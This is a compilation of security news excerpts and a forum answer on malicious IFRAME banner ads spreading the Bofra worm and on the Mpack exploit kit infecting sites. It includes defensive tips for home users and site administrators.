"Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.

Site operators are being cautioned to verify that the banners do not contain the IFRAME exploit code, or failing that, temporarily disable banner ads to minimize the risk of accidentally infecting users and propagating the exploit. The ISC did not identify any of the affected sites.

Users clicking on the banners are being infected with variants of the Bofra worm that has been proporagating through e-mail and malicious web sites. Bofra appeared just days after the revelation of the IFRAME vulnerability, which affects Internet Explorer 6 on all Windows platforms except Windows XP Service Pack 2 (SP2). This vulnerability allows attackers to gain complete control of a user's computer.

How can I protect against malicious iFrames - CNET Viruses & security alerts Forums

on-line linkscanner:
http://linkscanner.explabs.com/linkscanner/default.asp

But the best you could do:
For home users:
* Beware of pages that require software installation. Do not allow new software installation from your browser unless you absolutely trust both the Web page and the provider of the software.
* Scan with an updated antivirus and anti-spyware software any program downloaded through the Internet. This includes any downloads from P2P networks, through the Web and any FTP server regardless of the source.
* Beware of unexpected strange-looking emails, regardless of their sender. Never open attachments or click on links contained in these email messages.
* Enable the “Automatic Update” feature in your Windows operating system and apply new updates as soon as they are available.
* Always have an antivirus real-time scan service. Monitor regularly that it is being updated and that the service is running.
* Free security tools are available at www.trendmicro.com
http://us.trendmicro.com/us/about/news/pr/article/20070618185040.html

Computerworld - Porn sites serve up Mpack attacks

Several hundred pornography sites are surprising unwitting users with a smorgasbord of exploits via Mpack, the already notorious hacker toolkit that launched massive attacks earlier this week from a network of more than 10,000 compromised domains.

Trend Micro has spotted nearly 200 porn domains -- most dealing in incestuous content -- that have either been hacked or are purposefully redirecting users to servers hosting Mpack, a professional, Russian-made collection of exploits that comes complete with a management console.

Even though there are far fewer porn sites in this newly discovered infection chain than in Monday's "Italian Job" attack -- called that because most of the 10,000+ hijacked sites were legitimate Italian domains -- they've managed to infect twice as many end-users' PCs, said Trend Micro in a posting to its malware blog.

"Right now, we are not sure whether the porn sites are compromised to host the IFRAMES, are created to do so, or are being paid to host the IFRAMES," acknowledged Trend Micro. The attack probably began June 17, the company said.

Other researchers have continued to dig into the Mpack-based attacks and have shared some of their findings. Symantec, for instance, asked how hackers were able to infect so many sites in such a short time, and how they could inject the necessary IFRAMES code -- the malicious code they added to the legitimate sites' HTML that redirected visitors to the Mpack server -- so quickly.

"The MPack gang appears to be using an IFRAME manager tool to automate the task on a large scale," said Amado Hidalgo, a Symantec security analyst. The tool, which Hidalgo said was basically an FTP updater using MySQL as a back-end database, regularly checks a large list of sites to inject the malicious IFRAME code.

Hidalgo also spelled out how hackers have been getting into legitimate sites, which puzzled investigators earlier this week. "It takes as input a list of Web site administrator accounts, possibly obtained in the black market," he said. Those administrator accounts are recorded in MySQL, and the manager can be left running so that it re-infects sites that have been purged of the IFRAMES code. "A simple clean-up of the page is not sufficient," advised Hidalgo. "The site administrator's credentials need to be changed."

Sophos, meanwhile, analyzed the nearly 4,000 compromised sites it had found delivering the malicious IFRAMES code, and found that the overwhelming majority -- 98 percent to be exact -- were running the Apache Web server. "The servers targeted in this attack have almost exclusively been running some flavor of Apache on Unix," said a Sophos in a blog entry Friday. That's not always the case, said Ron O'Brien, senior security analyst at Sophos. "Overall, hacked sites are about evenly split between Apache and [Microsoft] IIS servers, but in this subset it's almost entirely Apache." Another interesting factoid, said O'Brien: "Of all the sites we've tracked that serve malicious code, about 80 percent have been hacked."

Still other researchers rooted out details of Mpack, including its price and the nom-de-plume of its creator. Ken Dunham, director of VeriSign-iDefense's rapid response team, said Mpack sells for around US$1,000, and that the man [or woman] behind it goes by "$ash" in the Russian hacker underground. The latest version of Mpack, .90, includes exploits for eight different vulnerabilities, six of them flaws in Windows or Internet Explorer, including the dangerous ANI bug that affected Vista earlier this year.

"This is a powerful Web exploitation tool," Dunham said.